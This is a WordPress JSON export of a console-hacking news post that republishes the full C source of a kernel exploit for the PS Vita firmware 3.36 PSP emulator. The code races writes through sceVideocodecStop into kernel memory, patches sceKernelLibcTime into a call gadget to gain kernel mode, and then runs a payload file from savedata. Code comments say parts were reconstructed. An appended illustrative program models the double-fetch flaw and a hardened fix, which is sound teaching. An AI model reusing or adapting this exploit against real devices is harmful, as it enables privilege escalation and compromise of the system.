{"id":2812,"date":"2015-02-27T22:23:00","date_gmt":"2015-02-27T21:23:00","guid":{"rendered":"https:\/\/www.customprotocol.com\/?post_type=it_underground&amp;p=2812"},"modified":"2015-02-27T22:23:00","modified_gmt":"2015-02-27T21:23:00","slug":"qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36","status":"publish","type":"it_programmation","link":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","title":{"rendered":"Qwikrazor87 publishes the source code of his kernel exploit for firmware 3.36"},"content":{"rendered":"<p style=\"text-align: justify;\"><em>Qwikrazor87<\/em> - who needs no introduction - has just released to everyone the source code of his <strong>PSP kernel exploit<\/strong> running on PS Vita <em>firmware<\/em> 3.36 (the latest at the time of writing). Obviously reserved for the most seasoned or most curious developers, this exploit, which runs inside the Vita's PSP emulator, abuses a vulnerability in the <em>sceVideocodecStop<\/em> function, which the author had already mentioned in January on his <em>Twitter<\/em> account:<\/p>\n<div align=\"center\">\n<blockquote class=\"twitter-tweet\" lang=\"en\">\n<p>props to anyone that can exploit sceVideocodecStop on 3.30+ (which will then allow the other \"patched\" exploits to work)&nbsp;\ud83d\ude00<\/p>\n<p>\u2014 qwikrazor87 (@qwikrazor87) <a href=\"https:\/\/twitter.com\/qwikrazor87\/status\/560590515964375040\">29 January 2015<\/a><\/p>\n<\/blockquote>\n<\/div>\n<p style=\"text-align: justify;\">The vulnerability consists in filling the video codec's parameter buffer (the <em>a0<\/em> array handed to <em>sceVideocodecStop<\/em>) with specific content, and appears to rely on a race condition: a separate thread keeps modifying one field of that buffer while <em>sceVideocodecStop<\/em> is being called, so that the kernel-side handler apparently ends up writing through an attacker-chosen pointer. In the code below the racing thread keeps storing the target address minus 36 into <em>a0[11]<\/em>, so the kernel's store lands exactly on the target word. The first race aims at the <em>SceKermitMe<\/em> mutex UID inside the <em>sceMeCodecWrapper<\/em> module and loops until the kernel starts reporting error 0x800201C3 in <em>a0[2]<\/em>, presumably because the UID has been clobbered; the second aims at an instruction inside <em>sceKernelLibcTime<\/em> (0x8800F9C4), after which calling that function with the kernel-mode alias of <em>KernelContent<\/em> (bit 31 set) as second argument transfers control there in kernel mode. <em>KernelContent<\/em> clears <em>$k1<\/em>, recreates the mutex the first race clobbered, rewrites the patched spot as <em>jr $a0<\/em> (turning <em>sceKernelLibcTime<\/em> into a generic \"call the kernel function in the first argument\" gadget that ARK uses afterwards) and flushes the caches; the user-mode code then reads <em>ARK.BIN<\/em> from the savedata folder into the scratchpad at 0x10000 and jumps to it. If you did not understand any of that, it does not matter, have a look below anyway out of curiosity.&nbsp;\ud83d\ude1b<\/p>\n<pre class=\"lang:default decode:true\">\/* The original #include target was lost in extraction; the PSP SDK headers below cover the\n   kernel, thread, utility and I\/O calls used here. *\/\n#include &lt;pspsdk.h&gt;\n#include &lt;pspkernel.h&gt;\n#include &lt;psputils.h&gt;\n#include &lt;psputility.h&gt;\n#include &lt;pspiofilemgr.h&gt;\n#include &lt;string.h&gt;\n\n\/* Helpers from the exploit's other source files (not on this page); prototypes inferred from their use below. *\/\nvoid fillvram(u32 color);\nu32 FindExport(const char *module, const char *library, u32 nid);\nu32 FindImport(const char *library, u32 nid, int index);\nvoid _sw(u32 value, u32 address);\n\nu32 sceMeCodecWrapper = 0x88136800;\t\/\/kernel address of the ME codec wrapper module on 3.36\nvolatile u32 sw_address = 0;\t\t\/\/value the racing thread keeps storing into a0[11]\nvolatile int is_exploited = 0, running = 1;\t\/\/shared with the racing thread, hence volatile\nu32 a0[24];\t\t\t\t\/\/parameter block handed to sceVideocodecStop\n\n\/\/racing thread: keeps rewriting a0[11] with the target while the main thread hammers sceVideocodecStop\nint storethread(SceSize args, void *argp)\n{\n\twhile (running == 1) {\n\t\ta0[11] = sw_address;\n\t\tsceKernelDelayThread(1);\n\t}\n\n\tsceKernelExitThread(0);\n\treturn 0;\n}\n\n\/\/runs in kernel mode once the second race has succeeded\nvoid KernelContent()\n{\n\tis_exploited = 1;\n\n\t__asm(\"move $k1, $0;\");\t\/\/clear $k1 so later syscalls are treated as kernel-mode calls\n\n\t\/\/\"restore\" me_wrapper mutex UID clobbered by the first race\n\tSceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) =\n\t\t(void *)FindExport(\"sceThreadManager\", \"ThreadManForUser\", 0xB7D098C6);\n\n\tSceUID mutex = _sceKernelCreateMutex(\"SceKermitMe\", 256, 0, NULL);\n\n\t_sw(mutex, sceMeCodecWrapper + 0x2F80);\n\n\t\/\/sceKernelLibcTime - pass address of kernel function in first arg, restored later in ARK code.\n\t_sw(0x00800008, 0x8800F9C4);\t\/\/jr\t$a0\n\t_sw(0, 0x8800F9C8);\t\t\/\/nop\n\n\tvoid (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;\n\tvoid (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;\n\n\t_sceKernelDcacheWritebackInvalidateAll();\n\t_sceKernelIcacheInvalidateAll();\n}\n\nvoid do_exploit()\n{\n\tis_exploited = 0;\n\trunning = 1;\n\n\t\/\/the kernel-side store lands at a0[11] + 36, so aim 36 bytes before the target:\n\t\/\/first target is the SceKermitMe mutex UID inside sceMeCodecWrapper\n\tsw_address = (sceMeCodecWrapper + 0x2F80) - 36;\n\n\tSceUID thid = sceKernelCreateThread(\"thid\", storethread, 8, 512, THREAD_ATTR_USER, NULL);\n\tsceKernelStartThread(thid, 0, NULL);\n\n\tsceUtilityLoadModule(0x300);\t\/\/PSP_MODULE_AV_AVCODEC\n\tsceUtilityLoadModule(0x303);\t\/\/PSP_MODULE_AV_MPEGBASE\n\n\tint (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport(\"sceVideocodec\", 0xA2F0564E, 0);\n\n\tmemset(a0, 0, sizeof(a0));\n\n\ta0[0] = 0x05100601;\n\ta0[15] = 1;\n\n\t\/\/first race: keep calling sceVideocodecStop until the kernel reports 0x800201C3 in a0[2]\n\twhile (a0[2] != 0x800201C3) {\n\t\ta0[15] = 1;\n\t\ta0[3] = 0x09000000;\n\t\ta0[4] = 0x09000000;\n\t\ta0[2] = 0;\n\t\ta0[11] = 0x09000000;\n\n\t\tsceVideocodecStop(a0, 0);\n\t}\n\n\tfillvram(-1);\n\n\t\/\/second race: same trick aimed at an instruction inside sceKernelLibcTime\n\tsw_address = 0x8800F9C4 - 36;\n\n\tint (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;\n\n\t\/\/once the store has landed, calling sceKernelLibcTime with the kernel-mode alias of KernelContent\n\t\/\/(bit 31 set) as second argument transfers control to it; KernelContent sets is_exploited\n\twhile (is_exploited != 1) {\n\t\ta0[15] = 1;\n\t\ta0[11] = 0x09000000;\n\t\ta0[3] = 0x09000000;\n\t\ta0[4] = 0x09000000;\n\n\t\tsceVideocodecStop(a0, 0);\n\n\t\tsceKernelDcacheWritebackAll();\n\n\t\t_sceKernelLibcTime(0x08800000, ((u32)&amp;KernelContent | 0x80000000));\n\t}\n\n\tfillvram(0xFF00);\n\n\trunning = 0;\n\n\t\/\/load ARK.BIN from the savedata folder into the 16 KiB scratchpad at 0x10000 and jump to it\n\tu8 buf[0x4000];\n\n\tSceUID fd = sceIoOpen(\"ms0:\/PSP\/SAVEDATA\/NPUG80320KEXPLOIT\/ARK.BIN\", PSP_O_RDONLY, 0777);\n\tsceIoRead(fd, buf, sizeof(buf));\n\tsceIoClose(fd);\n\n\tmemcpy((void *)0x10000, buf, sizeof(buf));\n\n\tsceKernelDcacheWritebackAll();\n\n\tvoid (* Start)(const char *) = (void *)0x10000;\n\tStart(\"ms0:\/PSP\/SAVEDATA\/NPUG80320KEXPLOIT\/\");\n}\n\nvoid _start() __attribute__ ((section (\".text.start\")));\nvoid _start()\n{\n\tfillvram(0x80808080);\n\tdo_exploit();\n\tsceKernelExitGame();\n}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>The source code of Qwikrazor87's PSP-emulator kernel exploit for firmware 3.36 is now public.<\/p>\n","protected":false},"author":481,"featured_media":2813,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","format":"standard","meta":{"footnotes":""},"categories":[4,586,29,454,30],"tags":[],"programmation-categorie":[620],"class_list":["post-2812","it_programmation","type-it_programmation","status-publish","format-standard","has-post-thumbnail","hentry","category-news","category-news-programmation","category-news-underground","category-programmation","category-underground","programmation_categorie-code-source"],"yoast_head":"\n<title>Source code of the kernel exploit for 3.36 - Custom Protocol<\/title>\n<meta name=\"description\" content=\"The source code of Qwikrazor87&#039;s PSP-emulator kernel exploit for firmware 3.36 is now public.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Source code of the kernel exploit for 3.36 - Custom Protocol\" \/>\n<meta property=\"og:description\" content=\"The source code of Qwikrazor87&#039;s PSP-emulator kernel exploit for firmware 3.36 is now public.\" \/>\n<meta property=\"og:url\" 
content=\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\" \/>\n<meta property=\"og:site_name\" content=\"Custom Protocol\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.customprotocol.com\/medias\/2015\/02\/PSP-emulator-kernel-exploit-souce-code-qwikrazor87-illustration.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\",\"url\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\",\"name\":\"Source code of the kernel exploit for 3.36 - Custom Protocol\",\"isPartOf\":{\"@id\":\"https:\/\/www.customprotocol.com\/#website\"},\"datePublished\":\"2015-02-27T21:23:00+00:00\",\"dateModified\":\"2015-02-27T21:23:00+00:00\",\"description\":\"The source code of Qwikrazor87's PSP-emulator kernel exploit for firmware 3.36 is now public.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.customprotocol.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Programming\",\"item\":\"https:\/\/www.customprotocol.com\/programmation\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Qwikrazor87 publishes the source code of his kernel exploit for firmware 3.36\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.customprotocol.com\/#website\",\"url\":\"https:\/\/www.customprotocol.com\/\",\"name\":\"Custom Protocol\",\"description\":\"Hacking news and tutorials site on customizing consoles and devices (homebrews, plugins, emulation...)\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.customprotocol.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"}]}<\/script>\n","yoast_head_json":{"title":"Source code of the kernel exploit for 3.36 - Custom Protocol","description":"The source code of Qwikrazor87's PSP-emulator kernel exploit for firmware 3.36 is now public.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","og_locale":"fr_CA","og_type":"article","og_title":"Source code of the kernel exploit for 3.36 - Custom Protocol","og_description":"The source code of Qwikrazor87's PSP-emulator kernel exploit for firmware 3.36 is now public.","og_url":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","og_site_name":"Custom Protocol","og_image":[{"width":1280,"height":720,"url":"https:\/\/www.customprotocol.com\/medias\/2015\/02\/PSP-emulator-kernel-exploit-souce-code-qwikrazor87-illustration.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Estimated reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","url":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/","name":"Source code of the kernel exploit for 3.36 - Custom Protocol","isPartOf":{"@id":"https:\/\/www.customprotocol.com\/#website"},"datePublished":"2015-02-27T21:23:00+00:00","dateModified":"2015-02-27T21:23:00+00:00","description":"The source code of Qwikrazor87's PSP-emulator kernel exploit for firmware 3.36 is now public.","breadcrumb":{"@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.customprotocol.com\/programmation\/qwikrazor87-publie-le-code-source-de-son-kernel-exploit-pour-firmware-3-36\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.customprotocol.com\/"},{"@type":"ListItem","position":2,"name":"Programming","item":"https:\/\/www.customprotocol.com\/programmation\/"},{"@type":"ListItem","position":3,"name":"Qwikrazor87 publishes the source code of his kernel exploit for firmware 3.36"}]},{"@type":"WebSite","@id":"https:\/\/www.customprotocol.com\/#website","url":"https:\/\/www.customprotocol.com\/","name":"Custom Protocol","description":"Hacking news and tutorials site on customizing consoles and devices (homebrews, plugins, emulation...)","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.customprotocol.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"}]}},"_links":{"self":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation\/2812","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation"}],"about":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/types\/it_programmation"}],"author":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/users\/481"}],"replies":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/comments?post=2812"}],"version-history":[{"count":0,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation\/2812\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/media\/2813"}],"wp:attachment":[{"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/media?parent=2812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/categories?post=2812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/tags?post=2812"},{"taxonomy":"programmation_categorie","embeddable":true,"href":"https:\/\/www.customprotocol.com\/api\/wp\/v2\/programmation-categorie?post=2812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
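As an added illustration (not part of the original article and not qwikrazor87's code), the C program below models the double-fetch race that the sceVideocodecStop exploit in the article depends on: a "kernel" handler reads the user-supplied a0[11] once to range-check it and a second time to perform a store at a0[11] + 36, while an attacker changes the field in between, so the store lands on a kernel word of the attacker's choosing. The one-array address space, the range check, the window callback that stands in for the racing thread, the hypothetical KERNEL_TARGET and the hardened variant are all assumptions of this example; the real PSP handler's internals are not on the page. The value written, 0x00800008, is the jr $a0 encoding the exploit itself patches into sceKernelLibcTime.

```c
/* Added example (not qwikrazor87's code): user-space model of the double-fetch race
 * behind the sceVideocodecStop exploit. The address space, the range check, the
 * "window" hook standing in for the racing thread and KERNEL_TARGET are all
 * assumptions made for the illustration; the PSP handler's real internals are not on the page. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define SPACE_SIZE    0x1000      /* simulated address space, one byte array */
#define KERNEL_BASE   0x800       /* [KERNEL_BASE, SPACE_SIZE) plays the role of kernel memory */
#define KERNEL_TARGET 0x9C4       /* hypothetical kernel word to overwrite (like 0x8800F9C4 in the exploit) */
#define USER_PTR      0x100       /* benign user pointer that passes the range check */
#define STORE_OFFSET  36          /* the handler stores at a0[11] + 36, the offset the exploit aims for */
#define JR_A0         0x00800008u /* MIPS "jr $a0", the word the exploit itself patches in */

static uint8_t space[SPACE_SIZE];

/* Parameter block as handed to the codec; shared with the racing thread, hence volatile. */
typedef struct { volatile uint32_t a0[24]; } codec_args;

/* Models "the other thread runs here", between the handler's check and its use. */
typedef void (*window_fn)(codec_args *);

static int user_word(uint32_t addr)
{
    return addr <= KERNEL_BASE - 4;   /* the whole 4-byte word must stay below kernel memory */
}

/* Vulnerable handler: a0[11] is fetched twice, once to validate and once to use. */
static int vuln_stop(codec_args *args, window_fn window, uint32_t value)
{
    uint32_t checked = args->a0[11] + STORE_OFFSET;
    if (!user_word(checked))
        return -1;
    if (window)
        window(args);
    uint32_t used = args->a0[11] + STORE_OFFSET;  /* second fetch: may differ from `checked` */
    if (used > SPACE_SIZE - 4)
        return -2;                                /* keep the simulation inside its array */
    memcpy(&space[used], &value, sizeof value);
    return 0;
}

/* Hardened handler: one fetch into a local; check and store use the same value. */
static int safe_stop(codec_args *args, window_fn window, uint32_t value)
{
    uint32_t dest = args->a0[11] + STORE_OFFSET;
    if (!user_word(dest))
        return -1;
    if (window)
        window(args);                             /* a0[11] may change, dest cannot */
    memcpy(&space[dest], &value, sizeof value);
    return 0;
}

/* What the exploit's store thread does: park a0[11] at target - 36. */
static void attacker_window(codec_args *args)
{
    args->a0[11] = KERNEL_TARGET - STORE_OFFSET;
}

static uint32_t read_word(uint32_t addr)
{
    uint32_t v;
    memcpy(&v, &space[addr], sizeof v);
    return v;
}

/* One call in which the attacker wins the race. Returns 1 if the kernel word now holds
 * `value`, 0 if the store stayed in user memory, -1 if the handler refused the call. */
int run_race(int hardened, uint32_t value)
{
    codec_args args;
    memset(space, 0, sizeof space);
    memset(&args, 0, sizeof args);
    args.a0[11] = USER_PTR;                       /* benign at check time */

    int rc = hardened ? safe_stop(&args, attacker_window, value)
                      : vuln_stop(&args, attacker_window, value);
    if (rc != 0)
        return -1;
    return read_word(KERNEL_TARGET) == value;
}

/* Without the race the check alone suffices: a kernel-pointing a0[11] is refused. */
int run_direct(uint32_t value)
{
    codec_args args;
    memset(space, 0, sizeof space);
    memset(&args, 0, sizeof args);
    args.a0[11] = KERNEL_TARGET - STORE_OFFSET;
    return vuln_stop(&args, NULL, value);
}

int main(void)
{
    printf("vulnerable handler, attacker wins the race: kernel word hit = %d\n", run_race(0, JR_A0));
    printf("hardened handler,   attacker wins the race: kernel word hit = %d\n", run_race(1, JR_A0));
    printf("vulnerable handler, no race: rc = %d\n", run_direct(JR_A0));
    return 0;
}
```

In the real exploit the interleaving is won statistically by a thread that loops on a0[11] = sw_address while the main thread keeps calling sceVideocodecStop; here it is made explicit through the window callback so the outcome is deterministic. The fix is the same one that applies to any double fetch of user-controlled memory: copy the parameter once into a local and use that copy for both the check and the store, as safe_stop does.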